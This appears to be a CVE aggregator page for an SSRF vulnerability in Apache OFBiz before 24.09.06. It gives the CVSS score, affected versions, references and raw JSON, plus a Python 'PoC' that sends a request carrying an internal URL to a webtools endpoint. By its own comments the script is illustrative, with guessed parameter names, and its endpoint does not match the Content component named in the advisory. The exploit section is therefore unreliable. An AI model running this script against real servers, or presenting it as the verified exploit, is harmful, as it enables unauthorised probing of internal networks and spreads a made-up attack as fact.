Security Vulnerability Report
中文
CVE-2026-29226 CVSS 7.3 HIGH

CVE-2026-29226

Published: 2026-05-19 10:16:23
Last Modified: 2026-05-19 19:16:47

Description

Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz via Content component operations. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* - VULNERABLE
Apache OFBiz < 24.09.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-29226 (Apache OFBiz SSRF) This script demonstrates the Server-Side Request Forgery vulnerability by forcing the server to make a request to an internal service. """ import requests def check_ssrf(target_host, internal_ip="127.0.0.1", internal_port="8080"): # The vulnerable endpoint is typically within the Content component operations. # This payload structure is illustrative based on OFBiz request patterns. url = f"{target_host}/webtools/control/ProgramExport" # Malicious parameters to trigger SSRF # Note: Actual parameter names may vary based on the specific operation in Content component params = { "url": f"http://{internal_ip}:{internal_port}", "filename": "ssrf_test.txt" } try: print(f"[*] Sending SSRF request to {target_host} targeting {internal_ip}") response = requests.get(url, params=params, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check the internal server logs for connection attempts.") print(f"[+] Response length: {len(response.text)} bytes") # In a real scenario, analyze response content for leaked data else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost:8080" check_ssrf(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29226", "sourceIdentifier": "[email protected]", "published": "2026-05-19T10:16:22.730", "lastModified": "2026-05-19T19:16:46.960", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz via Content component operations.\n\nThis issue affects Apache OFBiz: before 24.09.06.\n\nUsers are recommended to upgrade to version 24.09.06, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.09.06", "matchCriteriaId": "CEB63EC9-E307-4D7E-98E3-142E0225D178"}]}]}], "references": [{"url": "https://lists.apache.org/thread/6707wys8jxzmowxggn4cmtwwk9ygl2tr", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/16", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}